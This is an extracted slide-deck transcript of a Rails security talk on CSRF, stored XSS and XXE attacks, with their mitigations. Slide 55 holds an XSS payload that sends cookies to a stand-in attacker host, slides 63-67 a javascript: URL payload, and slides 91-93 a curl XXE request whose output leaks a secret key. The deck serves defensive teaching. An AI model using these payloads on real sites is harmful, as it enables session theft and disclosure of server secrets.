Slide 1

Slide 1 text

SECURITY IS BROKEN Understanding Common Vulnerabilities

Slide 2

Slide 2 text

No content

Slide 3

Slide 3 text

EILEEN M. UCHITELLE Security, Infrastructure & Performance Team at Basecamp ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes

Slide 4

Slide 4 text

OPEN SOURCE Rails Committers Rails Security

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

How is security broken?

Slide 8

Slide 8 text

• Impossible to test for all possible vulnerabilities How is security broken?

Slide 9

Slide 9 text

• Impossible to test for all possible vulnerabilities • Hackers are always one step ahead How is security broken?

Slide 10

Slide 10 text

• Impossible to test for all possible vulnerabilities • Hackers are always one step ahead • Patching one vulnerability can lead to exposing new ones How is security broken?

Slide 11

Slide 11 text

How did we get here?

Slide 12

Slide 12 text

• Failed to enforce web standards How did we get here?

Slide 13

Slide 13 text

vs.

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

• Failed to enforce web standards • Failed to implement a deﬁnition of security How did we get here?

Slide 16

Slide 16 text

“...completely failed to come up with even the most rudimentary usable frameworks for understanding the security of modern software.” – Michal Zalewski, The Tangled Web

Slide 17

Slide 17 text

• Failed to enforce web standards • Failed to implement a deﬁnition of security • Too few people understand the vulnerabilities How did we get here?

Slide 18

Slide 18 text

No content

Slide 19

Slide 19 text

CSRF

Slide 20

Slide 20 text

CSRF Cross-Site Request Forgery

Slide 21

Slide 21 text

EXPLOITING CSRF

Slide 22

Slide 22 text

JESSIE The Hacker ARYA The User

Slide 23

Slide 23 text

No content

Slide 24

Slide 24 text

No content

Slide 25

Slide 25 text

Name Email Website

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

Looks the same, different URL

Slide 28

Slide 28 text

Name Email Website

Slide 29

Slide 29 text

Name Email Website Jessie’s email

Slide 30

Slide 30 text

Name Email Website Auto-submit form

Slide 31

Slide 31 text

Name Email Website Auto-submit form to victim site

Slide 32

Slide 32 text

Jessie’s email

Slide 33

Slide 33 text

How dangerous are CSRF attacks?

Slide 34

Slide 34 text

How can we protect  our users from  CSRF attacks?

Slide 35

Slide 35 text

• Use built-in framework CSRF protection How to mitigate CSRF?

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

class ApplicationController < ActionController::Base protect_from_forgery with: :exception end

Slide 38

Slide 38 text

Name Email Website CSRF protection

Slide 39

Slide 39 text

Caveat: CSRF protection in Rails is order-dependent

Slide 40

Slide 40 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end

Slide 41

Slide 41 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end Conditional authentication

Slide 42

Slide 42 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end class ChatsController < ApplicationController skip_before_action :authenticate before_action :authenticate_for_chat, only: :create end

Slide 43

Slide 43 text

Slide 44

Slide 44 text

>> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :verify_authenticity_token, :authenticate_for_chat ] Authentication callback is too late in the chain

Slide 45

Slide 45 text

class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end class ChatsController < ActionController::Base skip_before_action :authenticate before_action :authenticate_for_chat, only: :create protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end

Slide 46

Slide 46 text

>> ChatsController._process_action_callbacks.map(&:filter) =>[ :authenticate, :authenticate_for_chat, :verify_authenticity_token ] Corrected callback order

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

• Use built-in framework CSRF protection • Refresh tokens with the session / don’t reuse tokens How to mitigate CSRF?

Slide 49

Slide 49 text

class SessionsController < ApplicationController def destroy sign_out reset_session redirect_to sign_in_url end end Refreshes Authenticity Token

Slide 50

Slide 50 text

• Use built-in framework CSRF protection • Refresh tokens with the session / don’t reuse tokens • Mitigate XSS attacks How to mitigate CSRF?

Slide 51

Slide 51 text

XSS

Slide 52

Slide 52 text

XSS Cross-Site Scripting

Slide 53

Slide 53 text

EXPLOITING STORED XSS

Slide 54

Slide 54 text

No content

Slide 55

Slide 55 text

document.write( '<img src=“http://www.hax0rcats.com/' + document.cookie + '">' ); automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

Slide 56

Slide 56 text

No content

Slide 57

Slide 57 text

Escaped HTML

Slide 58

Slide 58 text

Profile

<%= notice %>

Name: <%= @user.name %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

Slide 59

Slide 59 text

Profile

<%= notice %>

Name: <%= (@user.name).html_safe %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

Slide 60

Slide 60 text

No content

Slide 61

Slide 61 text

JavaScript Scheme

Slide 62

Slide 62 text

No content

Slide 63

Slide 63 text

javascript://example.com/%0Aalert(1)

Slide 64

Slide 64 text

example.com/%0Aalert(1) JavaScript Scheme javascript://

Slide 65

Slide 65 text

javascript://example.com/%0Aalert(1) URL example.com

Slide 66

Slide 66 text

Percent encoded “line feed” javascript://example.com/%0Aalert(1) %0A

Slide 67

Slide 67 text

JavaScript Alert javascript://example.com/%0Aalert(1) alert(1)

Slide 68

Slide 68 text

How dangerous are XSS attacks?

Slide 69

Slide 69 text

How can we protect  our users from  XSS attacks?

Slide 70

Slide 70 text

• Always escape user-provided data How to mitigate XSS?

Slide 71

Slide 71 text

Profile

<%= notice %>

Name: <%= (@user.name).html_safe %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Don’t do this

Slide 72

Slide 72 text

No content

Slide 73

Slide 73 text

• Don’t HTML escape user-provided data • Sanitize user-provided data How to mitigate XSS?

Slide 74

Slide 74 text

Profile

<%= notice %>

Name: <%= sanitize(@user.name) %>

Email: <%= @user.email %>

Website: <%= link_to('website', @user.website) %>

<%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Will strip out unwanted tags and attributes

Slide 75

Slide 75 text

• Don’t HTML escape user-provided data • Sanitize user-provided data • Validate user-provided data How to mitigate XSS?

Slide 76

Slide 76 text

class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https ) validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

Slide 77

Slide 77 text

Slide 78

Slide 78 text

Slide 79

Slide 79 text

XXE

Slide 80

Slide 80 text

XXE XML eXternal Entity Attack

Slide 81

Slide 81 text

]> Take a nap Go on a long walk with my hooman &ext1; Take another nap Go to bed

Slide 82

Slide 82 text

]> Take a nap Go on a long walk with my hooman &ext1; Take another nap Go to bed Entity reference

Slide 83

Slide 83 text

Eat breakfast Bark at the mail carrier

Slide 84

Slide 84 text

Take a nap Go on a long walk with my hooman Eat breakfast Bark at the mail carrier Take another nap Go to bed

Slide 85

Slide 85 text

EXPLOITING XXE

Slide 86

Slide 86 text

class UsersController < ApplicationController def create @user = User.new(user_params) respond_to do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end

Slide 87

Slide 87 text

Slide 88

Slide 88 text

]> &name;

Slide 89

Slide 89 text

]> &name; Requested ﬁle

Slide 90

Slide 90 text

]> &name; Entity reference

Slide 91

Slide 91 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml POST request to users create

Slide 92

Slide 92 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml Payload

Slide 93

Slide 93 text

curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://dogbook.com/users.xml ... production: secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5 f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40 00e166a9a5 ... secrets.yml as user’s name

Slide 94

Slide 94 text

No content

Slide 95

Slide 95 text

How dangerous are XXE attacks?

Slide 96

Slide 96 text

No content

Slide 97

Slide 97 text

How can we protect  our servers from  XXE attacks?

Slide 98

Slide 98 text

• Don’t parse XML How to mitigate XXE?

Slide 99

Slide 99 text

Don’t parse XML

Slide 100

Slide 100 text

• Don’t parse XML • Don’t use parsers that allow entity replacement (LibXML) How to mitigate XXE?

Slide 101

Slide 101 text

>> LibXML::XML.default_substitute_entities >> true

Slide 102

Slide 102 text

• Don’t parse XML • Don’t use parsers that allow entity replacement (LibXML) • Whitelist known entities How to mitigate XXE?

Slide 103

Slide 103 text

Investigate vulnerabilities & patches SECURITY

Slide 104

Slide 104 text

GitHub  eileencodes/security_examples

Slide 105

Slide 105 text

owasp.org

Slide 106

Slide 106 text

No content

Slide 107

Slide 107 text

Brakeman

Slide 108

Slide 108 text

Resilience & empowerment SECURITY

Slide 109

Slide 109 text

No content

Slide 110

Slide 110 text

Awareness of vulnerabilities SECURITY

Slide 111

Slide 111 text

JESSIE The Hacker ARYA The User

Slide 112

Slide 112 text

No content

Slide 113

Slide 113 text

To the future

Slide 114

Slide 114 text

EILEEN M. UCHITELLE Security, Infrastructure & Performance Team at Basecamp ! eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes